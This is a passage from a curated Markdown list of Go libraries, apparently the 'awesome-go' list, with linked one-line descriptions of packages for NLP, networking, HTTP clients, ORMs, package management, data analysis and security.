- [numa](https://github.com/lrita/numa) - NUMA is a utility library, which is written in go. It help us to write some NUMA-AWARED code.
- [openapi](https://github.com/neotoolkit/openapi) - OpenAPI 3.x parser.
- [pdfgen](https://github.com/hyperboloide/pdfgen) - HTTP service to generate PDF from Json requests.
- [persian](https://github.com/mavihq/persian) - Some utilities for Persian language in go.
- [sandid](https://github.com/aofei/sandid) - Every grain of sand on earth has its own ID.
- [shellwords](https://github.com/Wing924/shellwords) - A Golang library to manipulate strings according to the word parsing rules of the UNIX Bourne shell.
- [shortid](https://github.com/teris-io/shortid) - Distributed generation of super short, unique, non-sequential, URL friendly IDs.
- [shoutrrr](https://github.com/containrrr/shoutrrr) - Notification library providing easy access to various messaging services like slack, mattermost, gotify and smtp among others.
- [sitemap-format](https://github.com/mingard/sitemap-format) - A simple sitemap generator, with a little syntactic sugar.
- [stateless](https://github.com/qmuntal/stateless) - A fluent library for creating state machines.
- [stats](https://github.com/go-playground/stats) - Monitors Go MemStats + System stats such as Memory, Swap and CPU and sends via UDP anywhere you want for logging etc...
- [turtle](https://github.com/hackebrot/turtle) - Emojis for Go.
- [url-shortener](https://github.com/pantrif/url-shortener) - A modern, powerful, and robust URL shortener microservice with mysql support.
- [VarHandler](https://github.com/azr/generators/tree/master/varhandler) - Generate boilerplate http input and output handling.
- [varint](https://github.com/chmike/varint) - A faster varying length integer encoder/decoder than the one provided in the standard library.
- [xdg](https://github.com/rkoesters/xdg) - FreeDesktop.org (xdg) Specs implemented in Go.
- [xkg](https://github.com/go-xkg/xkg) - X Keyboard Grabber.
- [xz](https://github.com/ulikunitz/xz) - Pure golang package for reading and writing xz-compressed files.
**[⬆ back to top](#contents)**
## Natural Language Processing
_Libraries for working with human languages._
See also [Text Processing](#text-processing) and [Text Analysis](#text-analysis).
### Language Detection
- [detectlanguage](https://github.com/detectlanguage/detectlanguage-go) - Language Detection API Go Client. Supports batch requests, short phrase or single word language detection.
- [getlang](https://github.com/rylans/getlang) - Fast natural language detection package.
- [guesslanguage](https://github.com/endeveit/guesslanguage) - Functions to determine the natural language of a unicode text.
- [whatlanggo](https://github.com/abadojack/whatlanggo) - Natural language detection package for Go. Supports 84 languages and 24 scripts (writing systems e.g. Latin, Cyrillic, etc).
### Morphological Analyzers
- [go-stem](https://github.com/agonopol/go-stem) - Implementation of the porter stemming algorithm.
- [go2vec](https://github.com/danieldk/go2vec) - Reader and utility functions for word2vec embeddings.
- [golibstemmer](https://github.com/rjohnsondev/golibstemmer) - Go bindings for the snowball libstemmer library including porter 2.
- [gosentiwordnet](https://github.com/dinopuguh/gosentiwordnet) - Sentiment analyzer using sentiwordnet lexicon in Go.
- [govader](https://github.com/jonreiter/govader) - Go implementation of [VADER Sentiment Analysis](https://github.com/cjhutto/vaderSentiment).
- [govader-backend](https://github.com/PIMPfiction/govader_backend) - Microservice implementation of [GoVader](https://github.com/jonreiter/govader).
- [kagome](https://github.com/ikawaha/kagome) - JP morphological analyzer written in pure Go.
- [libtextcat](https://github.com/goodsign/libtextcat) - Cgo binding for libtextcat C library. Guaranteed compatibility with version 2.2.
- [nlp](https://github.com/Shixzie/nlp) - Extract values from strings and fill your structs with nlp.
- [nlp](https://github.com/james-bowman/nlp) - Go Natural Language Processing library supporting LSA (Latent Semantic Analysis).
- [paicehusk](https://github.com/rookii/paicehusk) - Golang implementation of the Paice/Husk Stemming Algorithm.
- [porter](https://github.com/a2800276/porter) - This is a fairly straightforward port of Martin Porter's C implementation of the Porter stemming algorithm.
- [porter2](https://github.com/zhenjl/porter2) - Really fast Porter 2 stemmer.
- [RAKE.go](https://github.com/afjoseph/RAKE.Go) - Go port of the Rapid Automatic Keyword Extraction Algorithm (RAKE).
- [snowball](https://github.com/goodsign/snowball) - Snowball stemmer port (cgo wrapper) for Go. Provides word stem extraction functionality [Snowball native](http://snowball.tartarus.org/).
- [spaGO](https://github.com/nlpodyssey/spago) - Self-contained Machine Learning and Natural Language Processing library in Go.
- [spelling-corrector](https://github.com/jorelosorio/spellingcorrector) - A spelling corrector for the Spanish language or create your own.
### Slugifiers
- [go-slugify](https://github.com/mozillazg/go-slugify) - Make pretty slug with multiple languages support.
- [slug](https://github.com/gosimple/slug) - URL-friendly slugify with multiple languages support.
- [Slugify](https://github.com/avelino/slugify) - Go slugify application that handles string.
### Tokenizers
- [gojieba](https://github.com/yanyiwu/gojieba) - This is a Go implementation of [jieba](https://github.com/fxsjy/jieba) which a Chinese word splitting algorithm.
- [gotokenizer](https://github.com/xujiajun/gotokenizer) - A tokenizer based on the dictionary and Bigram language models for Golang. (Now only support chinese segmentation)
- [gse](https://github.com/go-ego/gse) - Go efficient text segmentation; support english, chinese, japanese and other.
- [MMSEGO](https://github.com/awsong/MMSEGO) - This is a GO implementation of [MMSEG](http://technology.chtsai.org/mmseg/) which a Chinese word splitting algorithm.
- [prose](https://github.com/jdkato/prose) - Library for text processing that supports tokenization, part-of-speech tagging, named-entity extraction, and more. English only.
- [segment](https://github.com/blevesearch/segment) - Go library for performing Unicode Text Segmentation as described in [Unicode Standard Annex #29](https://www.unicode.org/reports/tr29/)
- [sentences](https://github.com/neurosnap/sentences) - Sentence tokenizer: converts text into a list of sentences.
- [shamoji](https://github.com/osamingo/shamoji) - The shamoji is word filtering package written in Go.
- [stemmer](https://github.com/dchest/stemmer) - Stemmer packages for Go programming language. Includes English and German stemmers.
- [textcat](https://github.com/pebbe/textcat) - Go package for n-gram based text categorization, with support for utf-8 and raw text.
### Translation
- [go-i18n](https://github.com/nicksnyder/go-i18n/) - Package and an accompanying tool to work with localized text.
- [go-localize](https://github.com/m1/go-localize) - Simple and easy to use i18n (Internationalization and localization) engine - used for translating locale strings.
- [go-mystem](https://github.com/dveselov/mystem) - CGo bindings to Yandex.Mystem - russian morphology analyzer.
- [go-pinyin](https://github.com/mozillazg/go-pinyin) - CN Hanzi to Hanyu Pinyin converter.
- [gotext](https://github.com/leonelquinteros/gotext) - GNU gettext utilities for Go.
- [icu](https://github.com/goodsign/icu) - Cgo binding for icu4c C library detection and conversion functions. Guaranteed compatibility with version 50.1.
- [iuliia-go](https://github.com/mehanizm/iuliia-go) - Transliterate Cyrillic → Latin in every possible way.
- [spreak](https://github.com/vorlif/spreak) - Flexible translation and humanization library for Go, based on the concepts behind gettext.
- [t](https://github.com/youthlin/t) - Another i18n pkg for golang, which follows GNU gettext style and supports .po/.mo files: `t.T (gettext)`, `t.N (ngettext)`, etc. And it contains a cmd tool [xtemplate](https://github.com/youthlin/t/blob/main/cmd/xtemplate), which can extract messages as a pot file from text/html template.
### Transliteration
- [enca](https://github.com/endeveit/enca) - Minimal cgo bindings for [libenca](https://cihar.com/software/enca/), which detects character encodings.
- [go-unidecode](https://github.com/mozillazg/go-unidecode) - ASCII transliterations of Unicode text.
- [gounidecode](https://github.com/fiam/gounidecode) - Unicode transliterator (also known as unidecode) for Go.
- [transliterator](https://github.com/alexsergivan/transliterator) - Provides one-way string transliteration with supporting of language-specific transliteration rules.
**[⬆ back to top](#contents)**
## Networking
_Libraries for working with various layers of the network._
- [arp](https://github.com/mdlayher/arp) - Package arp implements the ARP protocol, as described in RFC 826.
- [buffstreams](https://github.com/stabbycutyou/buffstreams) - Streaming protocolbuffer data over TCP made easy.
- [canopus](https://github.com/zubairhamed/canopus) - CoAP Client/Server implementation (RFC 7252).
- [cidranger](https://github.com/yl2chen/cidranger) - Fast IP to CIDR lookup for Go.
- [dhcp6](https://github.com/mdlayher/dhcp6) - Package dhcp6 implements a DHCPv6 server, as described in RFC 3315.
- [dns](https://github.com/miekg/dns) - Go library for working with DNS.
- [dnsmonster](https://github.com/mosajjal/dnsmonster) - Passive DNS Capture/Monitoring Framework.
- [easytcp](https://github.com/DarthPestilane/easytcp) - A light-weight TCP framework written in Go (Golang), built with message router. EasyTCP helps you build a TCP server easily fast and less painful.
- [ether](https://github.com/songgao/ether) - Cross-platform Go package for sending and receiving ethernet frames.
- [ethernet](https://github.com/mdlayher/ethernet) - Package ethernet implements marshaling and unmarshaling of IEEE 802.3 Ethernet II frames and IEEE 802.1Q VLAN tags.
- [event](https://github.com/cheng-zhongliang/event) - Simple I/O event notification library wirtten in Golang.
- [fasthttp](https://github.com/valyala/fasthttp) - Package fasthttp is a fast HTTP implementation for Go, up to 10 times faster than net/http.
- [fortio](https://github.com/fortio/fortio) - Load testing library and command line tool, advanced echo server and web UI. Allows to specify a set query-per-second load and record latency histograms and other useful stats and graph them. Tcp, Http, gRPC.
- [ftp](https://github.com/jlaffaye/ftp) - Package ftp implements a FTP client as described in [RFC 959](https://tools.ietf.org/html/rfc959).
- [ftpserverlib](https://github.com/fclairamb/ftpserverlib) - Fully featured FTP server library.
- [fullproxy](https://github.com/shoriwe/fullproxy) - A fully featured scriptable and daemon configurable proxy and pivoting toolkit with SOCKS5, HTTP, raw ports and reverse proxy protocols.
- [gaio](https://github.com/xtaci/gaio) - High performance async-io networking for Golang in proactor mode.
- [gev](https://github.com/Allenxuxu/gev) - gev is a lightweight, fast non-blocking TCP network library based on Reactor mode.
- [gldap](https://github.com/jimlambrt/gldap) - gldap provides an ldap server implementation and you provide handlers for its ldap operations.
- [gmqtt](https://github.com/DrmagicE/gmqtt) - Gmqtt is a flexible, high-performance MQTT broker library that fully implements the MQTT protocol V3.1.1.
- [gnet](https://github.com/panjf2000/gnet) - `gnet` is a high-performance, lightweight, non-blocking, event-driven networking framework written in pure Go.
- [gnet](https://github.com/fish-tennis/gnet) - `gnet` is a high-performance networking framework,especially for game servers.
- [gNxI](https://github.com/google/gnxi) - A collection of tools for Network Management that use the gNMI and gNOI protocols.
- [go-getter](https://github.com/hashicorp/go-getter) - Go library for downloading files or directories from various sources using a URL.
- [go-powerdns](https://github.com/joeig/go-powerdns) - PowerDNS API bindings for Golang.
- [go-sse](https://github.com/lampctl/go-sse) - Go client and server implementation of HTML server-sent events.
- [go-stun](https://github.com/ccding/go-stun) - Go implementation of the STUN client (RFC 3489 and RFC 5389).
- [gobgp](https://github.com/osrg/gobgp) - BGP implemented in the Go Programming Language.
- [golibwireshark](https://github.com/sunwxg/golibwireshark) - Package golibwireshark use libwireshark library to decode pcap file and analyse dissection data.
- [gopacket](https://github.com/google/gopacket) - Go library for packet processing with libpcap bindings.
- [gopcap](https://github.com/akrennmair/gopcap) - Go wrapper for libpcap.
- [goshark](https://github.com/sunwxg/goshark) - Package goshark use tshark to decode IP packet and create data struct to analyse packet.
- [gosnmp](https://github.com/soniah/gosnmp) - Native Go library for performing SNMP actions.
- [gotcp](https://github.com/gansidui/gotcp) - Go package for quickly writing tcp applications.
- [grab](https://github.com/cavaliercoder/grab) - Go package for managing file downloads.
- [graval](https://github.com/koofr/graval) - Experimental FTP server framework.
- [gws](https://github.com/lxzan/gws) - High-Performance WebSocket Server & Client With AsyncIO Supporting .
- [HTTPLab](https://github.com/gchaincl/httplab) - HTTPLabs let you inspect HTTP requests and forge responses.
- [httpproxy](https://github.com/wzshiming/httpproxy) - HTTP proxy handler and dialer.
- [iplib](https://github.com/c-robinson/iplib) - Library for working with IP addresses (net.IP, net.IPNet), inspired by python [ipaddress](https://docs.python.org/3/library/ipaddress.html) and ruby [ipaddr](https://ruby-doc.org/stdlib-2.5.1/libdoc/ipaddr/rdoc/IPAddr.html)
- [jazigo](https://github.com/udhos/jazigo) - Jazigo is a tool written in Go for retrieving configuration for multiple network devices.
- [kcp-go](https://github.com/xtaci/kcp-go) - KCP - Fast and Reliable ARQ Protocol.
- [kcptun](https://github.com/xtaci/kcptun) - Extremely simple & fast udp tunnel based on KCP protocol.
- [lhttp](https://github.com/fanux/lhttp) - Powerful websocket framework, build your IM server more easily.
- [linkio](https://github.com/ian-kent/linkio) - Network link speed simulation for Reader/Writer interfaces.
- [llb](https://github.com/kirillDanshin/llb) - It's a very simple but quick backend for proxy servers. Can be useful for fast redirection to predefined domain with zero memory allocation and fast response.
- [mdns](https://github.com/hashicorp/mdns) - Simple mDNS (Multicast DNS) client/server library in Golang.
- [mqttPaho](https://eclipse.org/paho/clients/golang/) - The Paho Go Client provides an MQTT client library for connection to MQTT brokers via TCP, TLS or WebSockets.
- [nbio](https://github.com/lesismal/nbio) - Pure Go 1000k+ connections solution, support tls/http1.x/websocket and basically compatible with net/http, with high-performance and low memory cost, non-blocking, event-driven, easy-to-use.
- [netpoll](https://github.com/cloudwego/netpoll) - A high-performance non-blocking I/O networking framework, which focused on RPC scenarios, developed by ByteDance.
- [NFF-Go](https://github.com/intel-go/nff-go) - Framework for rapid development of performant network functions for cloud and bare-metal (former YANFF).
- [packet](https://github.com/aerogo/packet) - Send packets over TCP and UDP. It can buffer messages and hot-swap connections if needed.
- [panoptes-stream](https://github.com/yahoo/panoptes-stream) - A cloud native distributed streaming network telemetry (gNMI, Juniper JTI and Cisco MDT).
- [peerdiscovery](https://github.com/schollz/peerdiscovery) - Pure Go library for cross-platform local peer discovery using UDP multicast.
- [portproxy](https://github.com/aybabtme/portproxy) - Simple TCP proxy which adds CORS support to API's which don't support it.
- [publicip](https://github.com/polera/publicip) - Package publicip returns your public facing IPv4 address (internet egress).
- [quic-go](https://github.com/lucas-clemente/quic-go) - An implementation of the QUIC protocol in pure Go.
- [raw](https://github.com/mdlayher/raw) - Package raw enables reading and writing data at the device driver level for a network interface.
- [sftp](https://github.com/pkg/sftp) - Package sftp implements the SSH File Transfer Protocol as described in <https://filezilla-project.org/specs/draft-ietf-secsh-filexfer-02.txt>.
- [ssh](https://github.com/gliderlabs/ssh) - Higher-level API for building SSH servers (wraps crypto/ssh).
- [sslb](https://github.com/eduardonunesp/sslb) - It's a Super Simples Load Balancer, just a little project to achieve some kind of performance.
- [stun](https://github.com/go-rtc/stun) - Go implementation of RFC 5389 STUN protocol.
- [tcp_server](https://github.com/firstrow/tcp_server) - Go library for building tcp servers faster.
- [tspool](https://github.com/two/tspool) - A TCP Library use worker pool to improve performance and protect your server.
- [utp](https://github.com/anacrolix/utp) - Go uTP micro transport protocol implementation.
- [vssh](https://github.com/yahoo/vssh) - Go library for building network and server automation over SSH protocol.
- [water](https://github.com/songgao/water) - Simple TUN/TAP library.
- [webrtc](https://github.com/pions/webrtc) - A pure Go implementation of the WebRTC API.
- [winrm](https://github.com/masterzen/winrm) - Go WinRM client to remotely execute commands on Windows machines.
- [xtcp](https://github.com/xfxdev/xtcp) - TCP Server Framework with simultaneous full duplex communication, graceful shutdown, and custom protocol.
**[⬆ back to top](#contents)**
### HTTP Clients
_Libraries for making HTTP requests._
- [gentleman](https://github.com/h2non/gentleman) - Full-featured plugin-driven HTTP client library.
- [go-cleanhttp](https://github.com/hashicorp/go-cleanhttp) - Get easily stdlib HTTP client, which does not share any state with other clients.
- [go-http-client](https://github.com/bozd4g/go-http-client) - Make http calls simply and easily.
- [go-otelroundtripper](https://github.com/NdoleStudio/go-otelroundtripper) - Go http.RoundTripper that emits open telemetry metrics for HTTP requests.
- [go-req](https://github.com/wenerme/go-req) - Declarative golang HTTP client.
- [go-retryablehttp](https://github.com/hashicorp/go-retryablehttp) - Retryable HTTP client in Go.
- [go-zoox/fetch](https://github.com/go-zoox/fetch) - A Powerful, Lightweight, Easy Http Client, inspired by Web Fetch API.
- [grequests](https://github.com/levigross/grequests) - A Go "clone" of the great and famous Requests library.
- [heimdall](https://github.com/gojektech/heimdall) - An enhanced http client with retry and hystrix capabilities.
- [httpretry](https://github.com/ybbus/httpretry) - Enriches the default go HTTP client with retry functionality.
- [pester](https://github.com/sethgrid/pester) - Go HTTP client calls with retries, backoff, and concurrency.
- [req](https://github.com/imroc/req) - Simple Go HTTP client with Black Magic (Less code and More efficiency).
- [request](https://github.com/monaco-io/request) - HTTP client for golang. If you have experience about axios or requests, you will love it. No 3rd dependency.
- [requests](https://github.com/carlmjohnson/requests) - HTTP requests for Gophers. Uses context.Context and doesn't hide the underlying net/http.Client, making it compatible with standard Go APIs. Also includes testing tools.
- [resty](https://github.com/go-resty/resty) - Simple HTTP and REST client for Go inspired by Ruby rest-client.
- [rq](https://github.com/ddo/rq) - A nicer interface for golang stdlib HTTP client.
- [sling](https://github.com/dghubble/sling) - Sling is a Go HTTP client library for creating and sending API requests.
**[⬆ back to top](#contents)**
## OpenGL
_Libraries for using OpenGL in Go._
- [gl](https://github.com/go-gl/gl) - Go bindings for OpenGL (generated via glow).
- [glfw](https://github.com/go-gl/glfw) - Go bindings for GLFW 3.
- [go-glmatrix](https://github.com/technohippy/go-glmatrix) - Go port of [glMatrix](https://glmatrix.net/) library.
- [goxjs/gl](https://github.com/goxjs/gl) - Go cross-platform OpenGL bindings (OS X, Linux, Windows, browsers, iOS, Android).
- [goxjs/glfw](https://github.com/goxjs/glfw) - Go cross-platform glfw library for creating an OpenGL context and receiving events.
- [mathgl](https://github.com/go-gl/mathgl) - Pure Go math package specialized for 3D math, with inspiration from GLM.
**[⬆ back to top](#contents)**
## ORM
_Libraries that implement Object-Relational Mapping or datamapping techniques._
- [bun](https://github.com/uptrace/bun) - SQL-first Golang ORM. Successor of go-pg.
- [cacheme](https://github.com/Yiling-J/cacheme-go) - Schema based, typed Redis caching/memoize framework for Go.
- [ent](https://github.com/facebook/ent) - An entity framework for Go. Simple, yet powerful ORM for modeling and querying data.
- [go-firestorm](https://github.com/jschoedt/go-firestorm) - A simple ORM for Google/Firebase Cloud Firestore.
- [go-sql](https://github.com/rushteam/gosql) - A easy ORM for mysql.
- [go-sqlbuilder](https://github.com/huandu/go-sqlbuilder) - A flexible and powerful SQL string builder library plus a zero-config ORM.
- [go-store](https://github.com/gosuri/go-store) - Simple and fast Redis backed key-value store library for Go.
- [golobby/orm](https://github.com/golobby/orm) - Simple, fast, type-safe, generic orm for developer happiness.
- [GORM](https://github.com/go-gorm/gorm) - The fantastic ORM library for Golang, aims to be developer friendly.
- [gormt](https://github.com/xxjwxc/gormt) - Mysql database to golang gorm struct.
- [gorp](https://github.com/go-gorp/gorp) - Go Relational Persistence, ORM-ish library for Go.
- [grimoire](https://github.com/Fs02/grimoire) - Grimoire is a database access layer and validation for golang. (Support: MySQL, PostgreSQL and SQLite3).
- [lore](https://github.com/abrahambotros/lore) - Simple and lightweight pseudo-ORM/pseudo-struct-mapping environment for Go.
- [marlow](https://github.com/marlow/marlow) - Generated ORM from project structs for compile time safety assurances.
- [pop/soda](https://github.com/gobuffalo/pop) - Database migration, creation, ORM, etc... for MySQL, PostgreSQL, and SQLite.
- [Prisma](https://github.com/prisma/prisma-client-go) - Prisma Client Go, Typesafe database access for Go.
- [reform](https://github.com/go-reform/reform) - Better ORM for Go, based on non-empty interfaces and code generation.
- [rel](https://github.com/go-rel/rel) - Modern Database Access Layer for Golang - Testable, Extendable and Crafted Into a Clean and Elegant API.
- [SQLBoiler](https://github.com/volatiletech/sqlboiler) - ORM generator. Generate a featureful and blazing-fast ORM tailored to your database schema.
- [upper.io/db](https://github.com/upper/db) - Single interface for interacting with different data sources through the use of adapters that wrap mature database drivers.
- [XORM](https://gitea.com/xorm/xorm) - Simple and powerful ORM for Go. (Support: MySQL, MyMysql, PostgreSQL, Tidb, SQLite3, MsSql and Oracle).
- [Zoom](https://github.com/albrow/zoom) - Blazing-fast datastore and querying engine built on Redis.
**[⬆ back to top](#contents)**
## Package Management
_Official tooling for dependency and package management_
- [go modules](https://golang.org/cmd/go/#hdr-Modules__module_versions__and_more) - Modules are the unit of source code interchange and versioning. The go command has direct support for working with modules, including recording and resolving dependencies on other modules.
_Official experimental tooling for package management_
- [dep](https://github.com/golang/dep) - Go dependency tool.
- [vgo](https://go.googlesource.com/vgo/) - Versioned Go.
_Unofficial libraries for package and dependency management._
- [glide](https://github.com/Masterminds/glide) - Manage your golang vendor and vendored packages with ease. Inspired by tools like Maven, Bundler, and Pip.
- [godep](https://github.com/tools/godep) - dependency tool for go, godep helps build packages reproducibly by fixing their dependencies.
- [gom](https://github.com/mattn/gom) - Go Manager - bundle for go.
- [goop](https://github.com/nitrous-io/goop) - Simple dependency manager for Go (golang), inspired by Bundler.
- [gop](https://github.com/lunny/gop) - Build and manage your Go applications out of GOPATH.
- [gopm](https://github.com/gpmgo/gopm) - Go Package Manager.
- [govendor](https://github.com/kardianos/govendor) - Go Package Manager. Go vendor tool that works with the standard vendor file.
- [gpm](https://github.com/pote/gpm) - Barebones dependency manager for Go.
- [gup](https://github.com/nao1215/gup) - Update binaries installed by "go install".
- [johnny-deps](https://github.com/VividCortex/johnny-deps) - Minimal dependency version using Git.
- [modgv](https://github.com/lucasepe/modgv) - Converts 'go mod graph' output into Graphviz's DOT language.
- [mvn-golang](https://github.com/raydac/mvn-golang) - plugin that provides way for auto-loading of Golang SDK, dependency management and start build environment in Maven project infrastructure.
- [nut](https://github.com/jingweno/nut) - Vendor Go dependencies.
- [VenGO](https://github.com/DamnWidget/VenGO) - create and manage exportable isolated go virtual environments.
**[⬆ back to top](#contents)**
## Performance
- [go-instrument](https://github.com/nikolaydubina/go-instrument) - Automatically add spans to all methods and functions.
- [jaeger](https://github.com/jaegertracing/jaeger) - A distributed tracing system.
- [pixie](https://github.com/pixie-labs/pixie) - No instrumentation tracing for Golang applications via eBPF.
- [profile](https://github.com/pkg/profile) - Simple profiling support package for Go.
- [statsviz](https://github.com/arl/statsviz) - Live visualization of your Go application runtime statistics.
- [tracer](https://github.com/kamilsk/tracer) - Simple, lightweight tracing.
**[⬆ back to top](#contents)**
## Query Language
- [api-fu](https://github.com/ccbrown/api-fu) - Comprehensive GraphQL implementation.
- [dasel](https://github.com/tomwright/dasel) - Query and update data structures using selectors from the command line. Comparable to jq/yq but supports JSON, YAML, TOML and XML with zero runtime dependencies.
- [gojsonq](https://github.com/thedevsaddam/gojsonq) - A simple Go package to Query over JSON Data.
- [goven](https://github.com/SeldonIO/goven) - A drop-in query language for any database schema.
- [gqlgen](https://github.com/99designs/gqlgen) - go generate based graphql server library.
- [grapher](https://github.com/reaganiwadha/grapher) - A GraphQL field builder utilizing Go generics with extra utilities and features.
- [graphql](https://github.com/tmc/graphql) - graphql parser + utilities.
- [graphql](https://github.com/neelance/graphql-go) - GraphQL server with a focus on ease of use.
- [graphql-go](https://github.com/graphql-go/graphql) - Implementation of GraphQL for Go.
- [gws](https://github.com/Zaba505/gws) - Apollos' "GraphQL over Websocket" client and server implementation.
- [jsonpath](https://github.com/AsaiYusuke/jsonpath) - A query library for retrieving part of JSON based on JSONPath syntax.
- [jsonql](https://github.com/elgs/jsonql) - JSON query expression library in Golang.
- [jsonslice](https://github.com/bhmj/jsonslice) - Jsonpath queries with advanced filters.
- [rql](https://github.com/a8m/rql) - Resource Query Language for REST API.
- [rqp](https://github.com/timsolov/rest-query-parser) - Query Parser for REST API. Filtering, validations, both `AND`, `OR` operations are supported directly in the query.
- [straf](https://github.com/SonicRoshan/straf) - Easily Convert Golang structs to GraphQL objects.
**[⬆ back to top](#contents)**
## Resource Embedding
- [debme](https://github.com/leaanthony/debme) - Create an `embed.FS` from an existing `embed.FS` subdirectory.
- [esc](https://github.com/mjibson/esc) - Embeds files into Go programs and provides http.FileSystem interfaces to them.
- [fileb0x](https://github.com/UnnoTed/fileb0x) - Simple tool to embed files in go with focus on "customization" and ease to use.
- [go-resources](https://github.com/omeid/go-resources) - Unfancy resources embedding with Go.
- [go.rice](https://github.com/GeertJohan/go.rice) - go.rice is a Go package that makes working with resources such as HTML, JS, CSS, images, and templates very easy.
- [mule](https://github.com/wlbr/mule) - Embed external resources like images, movies ... into Go source code to create single file binaries using `go generate`. Focused on simplicity.
- [packr](https://github.com/gobuffalo/packr) - The simple and easy way to embed static files into Go binaries.
- [rebed](https://github.com/soypat/rebed) - Recreate folder structures and files from Go 1.16's `embed.FS` type
- [statics](https://github.com/go-playground/statics) - Embeds static resources into go files for single binary compilation + works with http.FileSystem + symlinks.
- [statik](https://github.com/rakyll/statik) - Embeds static files into a Go executable.
- [templify](https://github.com/wlbr/templify) - Embed external template files into Go code to create single file binaries.
- [vfsgen](https://github.com/shurcooL/vfsgen) - Generates a vfsdata.go file that statically implements the given virtual filesystem.
**[⬆ back to top](#contents)**
## Science and Data Analysis
_Libraries for scientific computing and data analyzing._
- [assocentity](https://github.com/ndabAP/assocentity) - Package assocentity returns the average distance from words to a given entity.
- [bradleyterry](https://github.com/seanhagen/bradleyterry) - Provides a Bradley-Terry Model for pairwise comparisons.
- [calendarheatmap](https://github.com/nikolaydubina/calendarheatmap) - Calendar heatmap in plain Go inspired by Github contribution activity.
- [chart](https://github.com/vdobler/chart) - Simple Chart Plotting library for Go. Supports many graphs types.
- [dataframe-go](https://github.com/rocketlaunchr/dataframe-go) - Dataframes for machine-learning and statistics (similar to pandas).
- [decimal](https://github.com/db47h/decimal) - Package decimal implements arbitrary-precision decimal floating-point arithmetic.
- [evaler](https://github.com/soniah/evaler) - Simple floating point arithmetic expression evaluator.
- [ewma](https://github.com/VividCortex/ewma) - Exponentially-weighted moving averages.
- [geom](https://github.com/skelterjohn/geom) - 2D geometry for golang.
- [go-dsp](https://github.com/mjibson/go-dsp) - Digital Signal Processing for Go.
- [go-estimate](https://github.com/milosgajdos/go-estimate) - State estimation and filtering algorithms in Go.
- [go-gt](https://github.com/ThePaw/go-gt) - Graph theory algorithms written in "Go" language.
- [godesim](https://github.com/soypat/godesim) - Extended/multivariable ODE solver framework for event-based simulations with simple API.
- [goent](https://github.com/kzahedi/goent) - GO Implementation of Entropy Measures.
- [gograph](https://github.com/hmdsefi/gograph) - A golang generic graph library that provides mathematical graph-theory and algorithms.
- [gohistogram](https://github.com/VividCortex/gohistogram) - Approximate histograms for data streams.
- [gonum](https://github.com/gonum/gonum) - Gonum is a set of numeric libraries for the Go programming language. It contains libraries for matrices, statistics, optimization, and more.
- [gonum/plot](https://github.com/gonum/plot) - gonum/plot provides an API for building and drawing plots in Go.
- [goraph](https://github.com/gyuho/goraph) - Pure Go graph theory library(data structure, algorithm visualization).
- [gosl](https://github.com/cpmech/gosl) - Go scientific library for linear algebra, FFT, geometry, NURBS, numerical methods, probabilities, optimisation, differential equations, and more.
- [GoStats](https://github.com/OGFris/GoStats) - GoStats is an Open Source GoLang library for math statistics mostly used in Machine Learning domains, it covers most of the Statistical measures functions.
- [graph](https://github.com/yourbasic/graph) - Library of basic graph algorithms.
- [jsonl-graph](https://github.com/nikolaydubina/jsonl-graph) - Tool to manipulate JSONL graphs with graphviz support.
- [ode](https://github.com/ChristopherRabotin/ode) - Ordinary differential equation (ODE) solver which supports extended states and channel-based iteration stop conditions.
- [orb](https://github.com/paulmach/orb) - 2D geometry types with clipping, GeoJSON and Mapbox Vector Tile support.
- [pagerank](https://github.com/alixaxel/pagerank) - Weighted PageRank algorithm implemented in Go.
- [piecewiselinear](https://github.com/sgreben/piecewiselinear) - Tiny linear interpolation library.
- [PiHex](https://github.com/claygod/PiHex) - Implementation of the "Bailey-Borwein-Plouffe" algorithm for the hexadecimal number Pi.
- [rootfinding](https://github.com/khezen/rootfinding) - root-finding algorithms library for finding roots of quadratic functions.
- [sparse](https://github.com/james-bowman/sparse) - Go Sparse matrix formats for linear algebra supporting scientific and machine learning applications, compatible with gonum matrix libraries.
- [stats](https://github.com/montanaflynn/stats) - Statistics package with common functions missing from the Golang standard library.
- [streamtools](https://github.com/nytlabs/streamtools) - general purpose, graphical tool for dealing with streams of data.
- [TextRank](https://github.com/DavidBelicza/TextRank) - TextRank implementation in Golang with extendable features (summarization, weighting, phrase extraction) and multithreading (goroutine) support.
- [triangolatte](https://github.com/tchayen/triangolatte) - 2D triangulation library. Allows translating lines and polygons (both based on points) to the language of GPUs.
**[⬆ back to top](#contents)**
## Security
_Libraries that are used to help make your application more secure._
- [acmetool](https://github.com/hlandau/acme) - ACME (Let's Encrypt) client tool with automatic renewal.
- [acra](https://github.com/cossacklabs/acra) - Network encryption proxy to protect database-based applications from data leaks: strong selective encryption, SQL injections prevention, intrusion detection system.
- [age](https://github.com/FiloSottile/age) - A simple, modern and secure encryption tool (and Go library) with small explicit keys, no config options, and UNIX-style composability.
- [argon2-hashing](https://github.com/andskur/argon2-hashing) - light wrapper around Go's argon2 package that closely mirrors with Go's standard library Bcrypt and simple-scrypt package.
- [argon2pw](https://github.com/raja/argon2pw) - Argon2 password hash generation with constant-time password comparison.
- [autocert](https://godoc.org/golang.org/x/crypto/acme/autocert) - Auto provision Let's Encrypt certificates and start a TLS server.
- [BadActor](https://github.com/jaredfolkins/badactor) - In-memory, application-driven jailer built in the spirit of fail2ban.
- [booster](https://github.com/anatol/booster) - Fast initramfs generator with full-disk encryption support.
- [Cameradar](https://github.com/Ullaakut/cameradar) - Tool and library to remotely hack RTSP streams from surveillance cameras.
- [certificates](https://github.com/mvmaasakkers/certificates) - An opinionated tool for generating tls certificates.
- [CertMagic](https://github.com/caddyserver/certmagic) - Mature, robust, and powerful ACME client integration for fully-managed TLS certificate issuance and renewal.
- [Coraza](https://github.com/corazawaf/coraza) - Enterprise-ready, modsecurity and OWASP CRS compatible WAF library.
- [dongle](https://github.com/golang-module/dongle) - A simple, semantic and developer-friendly golang package for encoding&decoding and encryption&decryption.
- [firewalld-rest](https://github.com/prashantgupta24/firewalld-rest) - A rest application to dynamically update firewalld rules on a linux server.
- [go-generate-password](https://github.com/m1/go-generate-password) - Password generator that can be used on the cli or as a library.
- [go-htpasswd](https://github.com/tg123/go-htpasswd) - Apache htpasswd Parser for Go.
- [go-password-validator](https://github.com/lane-c-wagner/go-password-validator) - Password validator based on raw cryptographic entropy values.
- [go-yara](https://github.com/hillu/go-yara) - Go Bindings for [YARA](https://github.com/plusvic/yara), the "pattern matching swiss knife for malware researchers (and everyone else)".
- [goArgonPass](https://github.com/dwin/goArgonPass) - Argon2 password hash and verification designed to be compatible with existing Python and PHP implementations.
